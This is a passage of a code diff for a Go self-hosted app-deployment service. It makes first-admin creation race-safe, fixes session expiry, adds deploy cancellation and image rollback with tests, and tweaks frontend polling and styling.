+			r.Post("/apps/{id}/delete", s.handlers.HandleAppDelete())
+			r.Post("/apps/{id}/deploy", s.handlers.HandleAppDeploy())
+			r.Post("/apps/{id}/deployments/cancel", s.handlers.HandleCancelDeploy())
+			r.Get("/apps/{id}/deployments", s.handlers.HandleAppDeployments())
+			r.Get("/apps/{id}/deployments/{deploymentID}/logs", s.handlers.HandleDeploymentLogsAPI())
+			r.Get("/apps/{id}/deployments/{deploymentID}/download", s.handlers.HandleDeploymentLogDownload())
+			r.Get("/apps/{id}/logs", s.handlers.HandleAppLogs())
+			r.Get("/apps/{id}/container-logs", s.handlers.HandleContainerLogsAPI())
+			r.Get("/apps/{id}/status", s.handlers.HandleAppStatusAPI())
+			r.Get("/apps/{id}/recent-deployments", s.handlers.HandleRecentDeploymentsAPI())
+			r.Post("/apps/{id}/rollback", s.handlers.HandleAppRollback())
+			r.Post("/apps/{id}/restart", s.handlers.HandleAppRestart())
+			r.Post("/apps/{id}/stop", s.handlers.HandleAppStop())
+			r.Post("/apps/{id}/start", s.handlers.HandleAppStart())
 
-		// Environment variables
-		r.Post("/apps/{id}/env-vars", s.handlers.HandleEnvVarAdd())
-		r.Post("/apps/{id}/env-vars/{varID}/delete", s.handlers.HandleEnvVarDelete())
+			// Environment variables
+			r.Post("/apps/{id}/env-vars", s.handlers.HandleEnvVarAdd())
+			r.Post("/apps/{id}/env-vars/{varID}/delete", s.handlers.HandleEnvVarDelete())
 
-		// Labels
-		r.Post("/apps/{id}/labels", s.handlers.HandleLabelAdd())
-		r.Post("/apps/{id}/labels/{labelID}/delete", s.handlers.HandleLabelDelete())
+			// Labels
+			r.Post("/apps/{id}/labels", s.handlers.HandleLabelAdd())
+			r.Post("/apps/{id}/labels/{labelID}/delete", s.handlers.HandleLabelDelete())
 
-		// Volumes
-		r.Post("/apps/{id}/volumes", s.handlers.HandleVolumeAdd())
-		r.Post("/apps/{id}/volumes/{volumeID}/delete", s.handlers.HandleVolumeDelete())
+			// Volumes
+			r.Post("/apps/{id}/volumes", s.handlers.HandleVolumeAdd())
+			r.Post("/apps/{id}/volumes/{volumeID}/delete", s.handlers.HandleVolumeDelete())
 
-		// Ports
-		r.Post("/apps/{id}/ports", s.handlers.HandlePortAdd())
-		r.Post("/apps/{id}/ports/{portID}/delete", s.handlers.HandlePortDelete())
+			// Ports
+			r.Post("/apps/{id}/ports", s.handlers.HandlePortAdd())
+			r.Post("/apps/{id}/ports/{portID}/delete", s.handlers.HandlePortDelete())
 		})
 	})
 

internal/service/auth/auth.go

@@ -10,7 +10,6 @@ import (
 	"log/slog"
 	"net/http"
 	"strings"
-	"time"
 
 	"github.com/gorilla/sessions"
 	"go.uber.org/fx"
@@ -163,34 +162,27 @@ func (svc *Service) IsSetupRequired(ctx context.Context) (bool, error) {
 }
 
 // CreateUser creates the initial admin user.
+// It uses a DB transaction to atomically check that no users exist and insert
+// the new admin user, preventing race conditions from concurrent setup requests.
 func (svc *Service) CreateUser(
 	ctx context.Context,
 	username, password string,
 ) (*models.User, error) {
-	// Check if user already exists
-	exists, err := models.UserExists(ctx, svc.db)
-	if err != nil {
-		return nil, fmt.Errorf("failed to check if user exists: %w", err)
-	}
-
-	if exists {
-		return nil, ErrUserExists
-	}
-
-	// Hash password
+	// Hash password before starting transaction.
 	hash, err := svc.HashPassword(password)
 	if err != nil {
 		return nil, fmt.Errorf("failed to hash password: %w", err)
 	}
 
-	// Create user
-	user := models.NewUser(svc.db)
-	user.Username = username
-	user.PasswordHash = hash
-
-	err = user.Save(ctx)
+	// Use a transaction so the "no users exist" check and the insert are atomic.
+	// SQLite serializes write transactions, so concurrent requests will block here.
+	user, err := models.CreateFirstUser(ctx, svc.db, username, hash)
 	if err != nil {
-		return nil, fmt.Errorf("failed to save user: %w", err)
+		return nil, fmt.Errorf("failed to create user: %w", err)
+	}
+
+	if user == nil {
+		return nil, ErrUserExists
 	}
 
 	svc.log.Info("user created", "username", username)
@@ -276,7 +268,7 @@ func (svc *Service) DestroySession(
 		return fmt.Errorf("failed to get session: %w", err)
 	}
 
-	session.Options.MaxAge = -1 * int(time.Second)
+	session.Options.MaxAge = -1
 
 	saveErr := session.Save(request, respWriter)
 	if saveErr != nil {

internal/service/auth/auth_test.go

@@ -2,6 +2,7 @@ package auth_test
 
 import (
 	"context"
+	"fmt"
 	"net/http"
 	"net/http/httptest"
 	"path/filepath"
@@ -70,71 +71,80 @@ func setupTestService(t *testing.T) (*auth.Service, func()) {
 	return svc, cleanup
 }
 
+func setupAuthService(t *testing.T, debug bool) *auth.Service {
+	t.Helper()
+
+	tmpDir := t.TempDir()
+
+	globals.SetAppname("upaas-test")
+	globals.SetVersion("test")
+
+	globalsInst, err := globals.New(fx.Lifecycle(nil))
+	require.NoError(t, err)
+
+	loggerInst, err := logger.New(
+		fx.Lifecycle(nil),
+		logger.Params{Globals: globalsInst},
+	)
+	require.NoError(t, err)
+
+	cfg := &config.Config{
+		Port:          8080,
+		DataDir:       tmpDir,
+		SessionSecret: "test-secret-key-at-least-32-chars",
+		Debug:         debug,
+	}
+
+	dbInst, err := database.New(fx.Lifecycle(nil), database.Params{
+		Logger: loggerInst,
+		Config: cfg,
+	})
+	require.NoError(t, err)
+
+	svc, err := auth.New(fx.Lifecycle(nil), auth.ServiceParams{
+		Logger:   loggerInst,
+		Config:   cfg,
+		Database: dbInst,
+	})
+	require.NoError(t, err)
+
+	return svc
+}
+
+func getSessionCookie(t *testing.T, svc *auth.Service) *http.Cookie {
+	t.Helper()
+
+	_, err := svc.CreateUser(context.Background(), "admin", "password123")
+	require.NoError(t, err)
+
+	user, err := svc.Authenticate(context.Background(), "admin", "password123")
+	require.NoError(t, err)
+
+	recorder := httptest.NewRecorder()
+	request := httptest.NewRequest(http.MethodGet, "/", nil)
+
+	err = svc.CreateSession(recorder, request, user)
+	require.NoError(t, err)
+
+	for _, c := range recorder.Result().Cookies() {
+		if c.Name == "upaas_session" {
+			return c
+		}
+	}
+
+	return nil
+}
+
 func TestSessionCookieSecureFlag(testingT *testing.T) {
 	testingT.Parallel()
 
 	testingT.Run("secure flag is true when debug is false", func(t *testing.T) {
 		t.Parallel()
 
-		tmpDir := t.TempDir()
-
-		globals.SetAppname("upaas-test")
-		globals.SetVersion("test")
-
-		globalsInst, err := globals.New(fx.Lifecycle(nil))
-		require.NoError(t, err)
-
-		loggerInst, err := logger.New(
-			fx.Lifecycle(nil),
-			logger.Params{Globals: globalsInst},
-		)
-		require.NoError(t, err)
-
-		cfg := &config.Config{
-			Port:          8080,
-			DataDir:       tmpDir,
-			SessionSecret: "test-secret-key-at-least-32-chars",
-			Debug:         false,
-		}
-
-		dbInst, err := database.New(fx.Lifecycle(nil), database.Params{
-			Logger: loggerInst,
-			Config: cfg,
-		})
-		require.NoError(t, err)
-
-		svc, err := auth.New(fx.Lifecycle(nil), auth.ServiceParams{
-			Logger:   loggerInst,
-			Config:   cfg,
-			Database: dbInst,
-		})
-		require.NoError(t, err)
-
-		// Create user and session, check cookie has Secure flag
-		_, err = svc.CreateUser(context.Background(), "admin", "password123")
-		require.NoError(t, err)
-
-		user, err := svc.Authenticate(context.Background(), "admin", "password123")
-		require.NoError(t, err)
-
-		recorder := httptest.NewRecorder()
-		request := httptest.NewRequest(http.MethodGet, "/", nil)
-
-		err = svc.CreateSession(recorder, request, user)
-		require.NoError(t, err)
-
-		cookies := recorder.Result().Cookies()
-		require.NotEmpty(t, cookies)
-
-		var sessionCookie *http.Cookie
-		for _, c := range cookies {
-			if c.Name == "upaas_session" {
-				sessionCookie = c
-				break
-			}
-		}
-		require.NotNil(t, sessionCookie, "session cookie should exist")
-		assert.True(t, sessionCookie.Secure, "session cookie should have Secure flag in production mode")
+		svc := setupAuthService(t, false)
+		cookie := getSessionCookie(t, svc)
+		require.NotNil(t, cookie, "session cookie should exist")
+		assert.True(t, cookie.Secure, "session cookie should have Secure flag in production mode")
 	})
 }
 
@@ -270,6 +280,54 @@ func TestCreateUser(testingT *testing.T) {
 	})
 }
 
+func TestCreateUserRaceCondition(testingT *testing.T) {
+	testingT.Parallel()
+
+	testingT.Run("concurrent setup requests create only one user", func(t *testing.T) {
+		t.Parallel()
+
+		svc, cleanup := setupTestService(t)
+		defer cleanup()
+
+		const goroutines = 10
+
+		results := make(chan error, goroutines)
+		start := make(chan struct{})
+
+		for i := range goroutines {
+			go func(idx int) {
+				<-start // Wait for all goroutines to be ready
+
+				_, err := svc.CreateUser(
+					context.Background(),
+					fmt.Sprintf("admin%d", idx),
+					"password123456",
+				)
+				results <- err
+			}(i)
+		}
+
+		// Release all goroutines simultaneously
+		close(start)
+
+		var successes, failures int
+
+		for range goroutines {
+			err := <-results
+			if err == nil {
+				successes++
+			} else {
+				require.ErrorIs(t, err, auth.ErrUserExists)
+
+				failures++
+			}
+		}
+
+		assert.Equal(t, 1, successes, "exactly one goroutine should succeed")
+		assert.Equal(t, goroutines-1, failures, "all other goroutines should fail with ErrUserExists")
+	})
+}
+
 func TestAuthenticate(testingT *testing.T) {
 	testingT.Parallel()
 
@@ -311,3 +369,38 @@ func TestAuthenticate(testingT *testing.T) {
 		assert.ErrorIs(t, err, auth.ErrInvalidCredentials)
 	})
 }
+
+func TestDestroySessionMaxAge(testingT *testing.T) {
+	testingT.Parallel()
+
+	testingT.Run("sets MaxAge to exactly -1", func(t *testing.T) {
+		t.Parallel()
+
+		svc, cleanup := setupTestService(t)
+		defer cleanup()
+
+		recorder := httptest.NewRecorder()
+		request := httptest.NewRequest(http.MethodGet, "/", nil)
+
+		err := svc.DestroySession(recorder, request)
+		require.NoError(t, err)
+
+		// Check the Set-Cookie header to verify MaxAge is -1 (immediate expiry).
+		// With MaxAge = -1, the cookie should have Max-Age=0 in the HTTP header
+		// (per http.Cookie semantics: negative MaxAge means delete now).
+		cookies := recorder.Result().Cookies()
+		require.NotEmpty(t, cookies, "expected a Set-Cookie header")
+
+		found := false
+
+		for _, c := range cookies {
+			if c.MaxAge < 0 {
+				found = true
+
+				break
+			}
+		}
+
+		assert.True(t, found, "expected a cookie with negative MaxAge (deletion)")
+	})
+}

internal/service/deploy/deploy.go

@@ -43,10 +43,14 @@ var (
 	ErrContainerUnhealthy = errors.New("container unhealthy after 60 seconds")
 	// ErrDeploymentInProgress indicates another deployment is already running.
 	ErrDeploymentInProgress = errors.New("deployment already in progress for this app")
+	// ErrDeployCancelled indicates the deployment was cancelled by a newer deploy.
+	ErrDeployCancelled = errors.New("deployment cancelled by newer deploy")
 	// ErrBuildTimeout indicates the build phase exceeded the timeout.
 	ErrBuildTimeout = errors.New("build timeout exceeded")
 	// ErrDeployTimeout indicates the deploy phase exceeded the timeout.
 	ErrDeployTimeout = errors.New("deploy timeout exceeded")
+	// ErrNoPreviousImage indicates there is no previous image to rollback to.
+	ErrNoPreviousImage = errors.New("no previous image available for rollback")
 )
 
 // logFlushInterval is how often to flush buffered logs to the database.
@@ -78,6 +82,7 @@ type deploymentLogWriter struct {
 	lineBuffer bytes.Buffer // buffer for incomplete lines
 	mu         sync.Mutex
 	done       chan struct{}
+	flushed    sync.WaitGroup  // waits for flush goroutine to finish
 	flushCtx   context.Context //nolint:containedctx // needed for async flush goroutine
 }
 
@@ -87,6 +92,8 @@ func newDeploymentLogWriter(ctx context.Context, deployment *models.Deployment)
 		done:       make(chan struct{}),
 		flushCtx:   ctx,
 	}
+	w.flushed.Add(1)
+
 	go w.runFlushLoop()
 
 	return w
@@ -128,12 +135,15 @@ func (w *deploymentLogWriter) Write(p []byte) (int, error) {
 	return len(p), nil
 }
 
-// Close stops the flush loop and performs a final flush.
+// Close stops the flush loop, waits for the final flush to complete.
 func (w *deploymentLogWriter) Close() {
 	close(w.done)
+	w.flushed.Wait()
 }
 
 func (w *deploymentLogWriter) runFlushLoop() {
+	defer w.flushed.Done()
+
 	ticker := time.NewTicker(logFlushInterval)
 	defer ticker.Stop()
 
@@ -199,15 +209,22 @@ type ServiceParams struct {
 	Notify   *notify.Service
 }
 
+// activeDeploy tracks a running deployment so it can be cancelled.
+type activeDeploy struct {
+	cancel context.CancelFunc
+	done   chan struct{}
+}
+
 // Service provides deployment functionality.
 type Service struct {
-	log      *slog.Logger
-	db       *database.Database
-	docker   *docker.Client
-	notify   *notify.Service
-	config   *config.Config
-	params   *ServiceParams
-	appLocks sync.Map // map[string]*sync.Mutex - per-app deployment locks
+	log           *slog.Logger
+	db            *database.Database
+	docker        *docker.Client
+	notify        *notify.Service
+	config        *config.Config
+	params        *ServiceParams
+	activeDeploys sync.Map // map[string]*activeDeploy - per-app active deployment tracking
+	appLocks      sync.Map // map[string]*sync.Mutex - per-app deployment locks
 }
 
 // New creates a new deploy Service.
@@ -268,12 +285,39 @@ func (svc *Service) GetLogFilePath(app *models.App, deployment *models.Deploymen
 	return filepath.Join(svc.config.DataDir, "logs", hostname, app.Name, filename)
 }
 
-// Deploy deploys an app.
+// HasActiveDeploy returns true if there is an active deployment for the given app.
+func (svc *Service) HasActiveDeploy(appID string) bool {
+	_, ok := svc.activeDeploys.Load(appID)
+
+	return ok
+}
+
+// CancelDeploy cancels any in-progress deployment for the given app
+// and waits for it to finish before returning. Returns true if a deployment
+// was cancelled, false if there was nothing to cancel.
+func (svc *Service) CancelDeploy(appID string) bool {
+	if !svc.HasActiveDeploy(appID) {
+		return false
+	}
+
+	svc.cancelActiveDeploy(appID)
+
+	return true
+}
+
+// Deploy deploys an app. If cancelExisting is true (e.g. webhook-triggered),
+// any in-progress deploy for the same app will be cancelled before starting.
+// If cancelExisting is false and a deploy is in progress, ErrDeploymentInProgress is returned.
 func (svc *Service) Deploy(
 	ctx context.Context,
 	app *models.App,
 	webhookEventID *int64,
+	cancelExisting bool,
 ) error {
+	if cancelExisting {
+		svc.cancelActiveDeploy(app.ID)
+	}
+
 	// Try to acquire per-app deployment lock
 	if !svc.tryLockApp(app.ID) {
 		svc.log.Warn("deployment already in progress", "app", app.Name)
@@ -282,45 +326,186 @@ func (svc *Service) Deploy(
 	}
 	defer svc.unlockApp(app.ID)
 
+	// Set up cancellable context and register as active deploy
+	deployCtx, cancel := context.WithCancel(ctx)
+	done := make(chan struct{})
+	ad := &activeDeploy{cancel: cancel, done: done}
+	svc.activeDeploys.Store(app.ID, ad)
+
+	defer func() {
+		cancel()
+		close(done)
+		svc.activeDeploys.Delete(app.ID)
+	}()
+
 	// Fetch webhook event and create deployment record
-	webhookEvent := svc.fetchWebhookEvent(ctx, webhookEventID)
+	webhookEvent := svc.fetchWebhookEvent(deployCtx, webhookEventID)
 
-	deployment, err := svc.createDeploymentRecord(ctx, app, webhookEventID, webhookEvent)
+	// Use a background context for DB operations that must complete regardless of cancellation
+	bgCtx := context.WithoutCancel(deployCtx)
+
+	deployment, err := svc.createDeploymentRecord(bgCtx, app, webhookEventID, webhookEvent)
 	if err != nil {
 		return err
 	}
 
-	svc.logWebhookPayload(ctx, deployment, webhookEvent)
+	svc.logWebhookPayload(bgCtx, deployment, webhookEvent)
 
-	err = svc.updateAppStatusBuilding(ctx, app)
+	err = svc.updateAppStatusBuilding(bgCtx, app)
 	if err != nil {
 		return err
 	}
 
-	svc.notify.NotifyBuildStart(ctx, app, deployment)
+	svc.notify.NotifyBuildStart(bgCtx, app, deployment)
 
+	return svc.runBuildAndDeploy(deployCtx, bgCtx, app, deployment)
+}
+
+// Rollback rolls back an app to its previous image.
+// It stops the current container, starts a new one with the previous image,
+// and creates a deployment record for the rollback.
+func (svc *Service) Rollback(ctx context.Context, app *models.App) error {
+	if !app.PreviousImageID.Valid || app.PreviousImageID.String == "" {
+		return ErrNoPreviousImage
+	}
+
+	// Acquire per-app deployment lock
+	if !svc.tryLockApp(app.ID) {
+		return ErrDeploymentInProgress
+	}
+	defer svc.unlockApp(app.ID)
+
+	bgCtx := context.WithoutCancel(ctx)
+
+	deployment, err := svc.createRollbackDeployment(bgCtx, app)
+	if err != nil {
+		return err
+	}
+
+	return svc.executeRollback(ctx, bgCtx, app, deployment)
+}
+
+// createRollbackDeployment creates a deployment record for a rollback operation.
+func (svc *Service) createRollbackDeployment(
+	ctx context.Context,
+	app *models.App,
+) (*models.Deployment, error) {
+	deployment := models.NewDeployment(svc.db)
+	deployment.AppID = app.ID
+	deployment.Status = models.DeploymentStatusDeploying
+	deployment.ImageID = sql.NullString{String: app.PreviousImageID.String, Valid: true}
+
+	saveErr := deployment.Save(ctx)
+	if saveErr != nil {
+		return nil, fmt.Errorf("failed to create rollback deployment: %w", saveErr)
+	}
+
+	_ = deployment.AppendLog(ctx, "Rolling back to previous image: "+app.PreviousImageID.String)
+
+	return deployment, nil
+}
+
+// executeRollback performs the container swap for a rollback.
+func (svc *Service) executeRollback(
+	ctx context.Context,
+	bgCtx context.Context,
+	app *models.App,
+	deployment *models.Deployment,
+) error {
+	previousImageID := app.PreviousImageID.String
+
+	svc.removeOldContainer(ctx, app, deployment)
+
+	rollbackOpts, err := svc.buildContainerOptions(ctx, app, deployment.ID)
+	if err != nil {
+		svc.failDeployment(bgCtx, app, deployment, err)
+
+		return fmt.Errorf("failed to build container options: %w", err)
+	}
+
+	rollbackOpts.Image = previousImageID
+
+	containerID, err := svc.docker.CreateContainer(ctx, rollbackOpts)
+	if err != nil {
+		svc.failDeployment(bgCtx, app, deployment, fmt.Errorf("failed to create rollback container: %w", err))
+
+		return fmt.Errorf("failed to create rollback container: %w", err)
+	}
+
+	deployment.ContainerID = sql.NullString{String: containerID, Valid: true}
+	_ = deployment.AppendLog(bgCtx, "Rollback container created: "+containerID)
+
+	startErr := svc.docker.StartContainer(ctx, containerID)
+	if startErr != nil {
+		svc.failDeployment(bgCtx, app, deployment, fmt.Errorf("failed to start rollback container: %w", startErr))
+
+		return fmt.Errorf("failed to start rollback container: %w", startErr)
+	}
+
+	_ = deployment.AppendLog(bgCtx, "Rollback container started")
+
+	currentImageID := app.ImageID
+	app.ImageID = sql.NullString{String: previousImageID, Valid: true}
+	app.PreviousImageID = currentImageID
+	app.Status = models.AppStatusRunning
+
+	saveErr := app.Save(bgCtx)
+	if saveErr != nil {
+		return fmt.Errorf("failed to update app after rollback: %w", saveErr)
+	}
+
+	_ = deployment.MarkFinished(bgCtx, models.DeploymentStatusSuccess)
+	_ = deployment.AppendLog(bgCtx, "Rollback complete")
+
+	svc.log.Info("rollback completed", "app", app.Name, "image", previousImageID)
+
+	return nil
+}
+
+// runBuildAndDeploy executes the build and deploy phases, handling cancellation.
+func (svc *Service) runBuildAndDeploy(
+	deployCtx context.Context,
+	bgCtx context.Context,
+	app *models.App,
+	deployment *models.Deployment,
+) error {
 	// Build phase with timeout
-	imageID, err := svc.buildImageWithTimeout(ctx, app, deployment)
+	imageID, err := svc.buildImageWithTimeout(deployCtx, app, deployment)
 	if err != nil {
+		cancelErr := svc.checkCancelled(deployCtx, bgCtx, app, deployment)
+		if cancelErr != nil {
+			return cancelErr
+		}
+
 		return err
 	}
 
-	svc.notify.NotifyBuildSuccess(ctx, app, deployment)
+	svc.notify.NotifyBuildSuccess(bgCtx, app, deployment)
 
 	// Deploy phase with timeout
-	err = svc.deployContainerWithTimeout(ctx, app, deployment, imageID)
+	err = svc.deployContainerWithTimeout(deployCtx, app, deployment, imageID)
 	if err != nil {
+		cancelErr := svc.checkCancelled(deployCtx, bgCtx, app, deployment)
+		if cancelErr != nil {
+			return cancelErr
+		}
+
 		return err
 	}
 
-	err = svc.updateAppRunning(ctx, app, imageID)
+	// Save current image as previous before updating to new one
+	if app.ImageID.Valid && app.ImageID.String != "" {
+		app.PreviousImageID = app.ImageID
+	}
+
+	err = svc.updateAppRunning(bgCtx, app, imageID)
 	if err != nil {
 		return err
 	}
 
 	// Use context.WithoutCancel to ensure health check completes even if
 	// the parent context is cancelled (e.g., HTTP request ends).
-	go svc.checkHealthAfterDelay(context.WithoutCancel(ctx), app, deployment)
+	go svc.checkHealthAfterDelay(bgCtx, app, deployment)
 
 	return nil
 }
@@ -457,6 +642,43 @@ func (svc *Service) unlockApp(appID string) {
 	svc.getAppLock(appID).Unlock()
 }
 
+// cancelActiveDeploy cancels any in-progress deployment for the given app
+// and waits for it to finish before returning.
+func (svc *Service) cancelActiveDeploy(appID string) {
+	val, ok := svc.activeDeploys.Load(appID)
+	if !ok {
+		return
+	}
+
+	ad, ok := val.(*activeDeploy)
+	if !ok {
+		return
+	}
+
+	svc.log.Info("cancelling in-progress deployment", "app_id", appID)
+	ad.cancel()
+	<-ad.done
+}
+
+// checkCancelled checks if the deploy context was cancelled (by a newer deploy)
+// and if so, marks the deployment as cancelled. Returns ErrDeployCancelled or nil.
+func (svc *Service) checkCancelled(
+	deployCtx context.Context,
+	bgCtx context.Context,
+	app *models.App,
+	deployment *models.Deployment,
+) error {
+	if !errors.Is(deployCtx.Err(), context.Canceled) {
+		return nil
+	}
+
+	svc.log.Info("deployment cancelled by newer deploy", "app", app.Name)
+
+	_ = deployment.MarkFinished(bgCtx, models.DeploymentStatusCancelled)
+
+	return ErrDeployCancelled
+}
+
 func (svc *Service) fetchWebhookEvent(
 	ctx context.Context,
 	webhookEventID *int64,

internal/service/deploy/deploy_cancel_test.go

@@ -0,0 +1,133 @@
+package deploy_test
+
+import (
+	"context"
+	"log/slog"
+	"sync"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/assert"
+
+	"git.eeqj.de/sneak/upaas/internal/service/deploy"
+)
+
+func TestCancelActiveDeploy_NoExisting(t *testing.T) {
+	t.Parallel()
+
+	svc := deploy.NewTestService(slog.Default())
+
+	// Should not panic or block when no active deploy exists
+	svc.CancelActiveDeploy("nonexistent-app")
+}
+
+func TestCancelActiveDeploy_CancelsAndWaits(t *testing.T) {
+	t.Parallel()
+
+	svc := deploy.NewTestService(slog.Default())
+
+	ctx, cancel := context.WithCancel(context.Background())
+	done := make(chan struct{})
+
+	svc.RegisterActiveDeploy("app-1", cancel, done)
+
+	// Simulate a running deploy that respects cancellation
+	var deployFinished bool
+
+	go func() {
+		<-ctx.Done()
+
+		deployFinished = true
+
+		close(done)
+	}()
+
+	svc.CancelActiveDeploy("app-1")
+	assert.True(t, deployFinished, "deploy should have finished after cancellation")
+}
+
+func TestCancelActiveDeploy_BlocksUntilDone(t *testing.T) {
+	t.Parallel()
+
+	svc := deploy.NewTestService(slog.Default())
+
+	ctx, cancel := context.WithCancel(context.Background())
+	done := make(chan struct{})
+
+	svc.RegisterActiveDeploy("app-2", cancel, done)
+
+	// Simulate slow cleanup after cancellation
+	go func() {
+		<-ctx.Done()
+		time.Sleep(50 * time.Millisecond)
+		close(done)
+	}()
+
+	start := time.Now()
+
+	svc.CancelActiveDeploy("app-2")
+
+	elapsed := time.Since(start)
+
+	assert.GreaterOrEqual(t, elapsed, 50*time.Millisecond,
+		"cancelActiveDeploy should block until the deploy finishes")
+}
+
+func TestTryLockApp_PreventsConcurrent(t *testing.T) {
+	t.Parallel()
+
+	svc := deploy.NewTestService(slog.Default())
+
+	assert.True(t, svc.TryLockApp("app-1"), "first lock should succeed")
+	assert.False(t, svc.TryLockApp("app-1"), "second lock should fail")
+
+	svc.UnlockApp("app-1")
+
+	assert.True(t, svc.TryLockApp("app-1"), "lock after unlock should succeed")
+
+	svc.UnlockApp("app-1")
+}
+
+func TestCancelActiveDeploy_AllowsNewDeploy(t *testing.T) {
+	t.Parallel()
+
+	svc := deploy.NewTestService(slog.Default())
+
+	// Simulate an active deploy holding the lock
+	ctx, cancel := context.WithCancel(context.Background())
+	done := make(chan struct{})
+
+	svc.RegisterActiveDeploy("app-3", cancel, done)
+
+	// Lock the app as if a deploy is in progress
+	assert.True(t, svc.TryLockApp("app-3"))
+
+	// Simulate deploy goroutine: release lock on cancellation
+	var mu sync.Mutex
+
+	released := false
+
+	go func() {
+		<-ctx.Done()
+
+		svc.UnlockApp("app-3")
+
+		mu.Lock()
+		released = true
+		mu.Unlock()
+
+		close(done)
+	}()
+
+	// Cancel should cause the old deploy to release its lock
+	svc.CancelActiveDeploy("app-3")
+
+	mu.Lock()
+	assert.True(t, released)
+	mu.Unlock()
+
+	// Now a new deploy should be able to acquire the lock
+	assert.True(t, svc.TryLockApp("app-3"), "should be able to lock after cancellation")
+
+	svc.UnlockApp("app-3")
+}

internal/service/deploy/deploy_rollback_test.go

@@ -0,0 +1,74 @@
+package deploy_test
+
+import (
+	"context"
+	"database/sql"
+	"log/slog"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+
+	"git.eeqj.de/sneak/upaas/internal/models"
+	"git.eeqj.de/sneak/upaas/internal/service/deploy"
+)
+
+func TestRollback_NoPreviousImage(t *testing.T) {
+	t.Parallel()
+
+	svc := deploy.NewTestService(slog.Default())
+	app := &models.App{
+		ID:              "app-rollback-1",
+		PreviousImageID: sql.NullString{},
+	}
+
+	err := svc.Rollback(context.Background(), app)
+	assert.ErrorIs(t, err, deploy.ErrNoPreviousImage)
+}
+
+func TestRollback_EmptyPreviousImage(t *testing.T) {
+	t.Parallel()
+
+	svc := deploy.NewTestService(slog.Default())
+	app := &models.App{
+		ID:              "app-rollback-2",
+		PreviousImageID: sql.NullString{String: "", Valid: true},
+	}
+
+	err := svc.Rollback(context.Background(), app)
+	assert.ErrorIs(t, err, deploy.ErrNoPreviousImage)
+}
+
+func TestRollback_DeploymentLocked(t *testing.T) {
+	t.Parallel()
+
+	svc := deploy.NewTestService(slog.Default())
+
+	// Simulate a deploy holding the lock
+	assert.True(t, svc.TryLockApp("app-rollback-3"))
+	defer svc.UnlockApp("app-rollback-3")
+
+	app := &models.App{
+		ID:              "app-rollback-3",
+		PreviousImageID: sql.NullString{String: "sha256:abc123", Valid: true},
+	}
+
+	err := svc.Rollback(context.Background(), app)
+	assert.ErrorIs(t, err, deploy.ErrDeploymentInProgress)
+}
+
+func TestRollback_LockedApp(t *testing.T) {
+	t.Parallel()
+
+	svc := deploy.NewTestService(slog.Default())
+
+	assert.True(t, svc.TryLockApp("app-rollback-4"))
+	defer svc.UnlockApp("app-rollback-4")
+
+	app := &models.App{
+		ID:              "app-rollback-4",
+		PreviousImageID: sql.NullString{String: "sha256:abc123", Valid: true},
+	}
+
+	err := svc.Rollback(context.Background(), app)
+	assert.ErrorIs(t, err, deploy.ErrDeploymentInProgress)
+}

internal/service/deploy/export_test.go

@@ -0,0 +1,33 @@
+package deploy
+
+import (
+	"context"
+	"log/slog"
+)
+
+// NewTestService creates a Service with minimal dependencies for testing.
+func NewTestService(log *slog.Logger) *Service {
+	return &Service{
+		log: log,
+	}
+}
+
+// CancelActiveDeploy exposes cancelActiveDeploy for testing.
+func (svc *Service) CancelActiveDeploy(appID string) {
+	svc.cancelActiveDeploy(appID)
+}
+
+// RegisterActiveDeploy registers an active deploy for testing.
+func (svc *Service) RegisterActiveDeploy(appID string, cancel context.CancelFunc, done chan struct{}) {
+	svc.activeDeploys.Store(appID, &activeDeploy{cancel: cancel, done: done})
+}
+
+// TryLockApp exposes tryLockApp for testing.
+func (svc *Service) TryLockApp(appID string) bool {
+	return svc.tryLockApp(appID)
+}
+
+// UnlockApp exposes unlockApp for testing.
+func (svc *Service) UnlockApp(appID string) {
+	svc.unlockApp(appID)
+}

internal/service/webhook/webhook.go

@@ -143,7 +143,7 @@ func (svc *Service) triggerDeployment(
 		// even if the HTTP request context is cancelled.
 		deployCtx := context.WithoutCancel(ctx)
 
-		deployErr := svc.deploy.Deploy(deployCtx, app, &eventID)
+		deployErr := svc.deploy.Deploy(deployCtx, app, &eventID, true)
 		if deployErr != nil {
 			svc.log.Error("deployment failed", "error", deployErr, "app", appName)
 		}

static/css/input.css

@@ -57,6 +57,10 @@
     @apply inline-flex items-center justify-center px-4 py-2 rounded-md font-medium text-sm transition-all duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 disabled:opacity-50 disabled:cursor-not-allowed bg-success-500 text-white hover:bg-success-700 active:bg-green-800 focus:ring-green-500 shadow-elevation-1 hover:shadow-elevation-2;
   }
 
+  .btn-warning {
+    @apply inline-flex items-center justify-center px-4 py-2 rounded-md font-medium text-sm transition-all duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 disabled:opacity-50 disabled:cursor-not-allowed bg-warning-500 text-white hover:bg-warning-700 active:bg-orange-800 focus:ring-orange-500 shadow-elevation-1 hover:shadow-elevation-2;
+  }
+
   .btn-text {
     @apply inline-flex items-center justify-center px-4 py-2 rounded-md font-medium text-sm transition-all duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 disabled:opacity-50 disabled:cursor-not-allowed text-primary-600 hover:bg-primary-50 active:bg-primary-100;
   }

static/js/app.js

@@ -185,11 +185,12 @@ document.addEventListener("alpine:init", () => {
     // Track whether user wants auto-scroll (per log pane)
     _containerAutoScroll: true,
     _buildAutoScroll: true,
+    _pollTimer: null,
 
     init() {
       this.deploying = Alpine.store("utils").isDeploying(this.appStatus);
       this.fetchAll();
-      setInterval(() => this.fetchAll(), 1000);
+      this._schedulePoll();
 
       // Set up scroll listeners after DOM is ready
       this.$nextTick(() => {
@@ -198,6 +199,15 @@ document.addEventListener("alpine:init", () => {
       });
     },
 
+    _schedulePoll() {
+      if (this._pollTimer) clearTimeout(this._pollTimer);
+      const interval = Alpine.store("utils").isDeploying(this.appStatus) ? 1000 : 10000;
+      this._pollTimer = setTimeout(() => {
+        this.fetchAll();
+        this._schedulePoll();
+      }, interval);
+    },
+
     _initScrollTracking(el, flag) {
       if (!el) return;
       el.addEventListener('scroll', () => {
@@ -207,18 +217,36 @@ document.addEventListener("alpine:init", () => {
 
     fetchAll() {
       this.fetchAppStatus();
-      this.fetchContainerLogs();
-      this.fetchBuildLogs();
+      // Only fetch logs when the respective pane is visible
+      if (this.$refs.containerLogsWrapper && this._isElementVisible(this.$refs.containerLogsWrapper)) {
+        this.fetchContainerLogs();
+      }
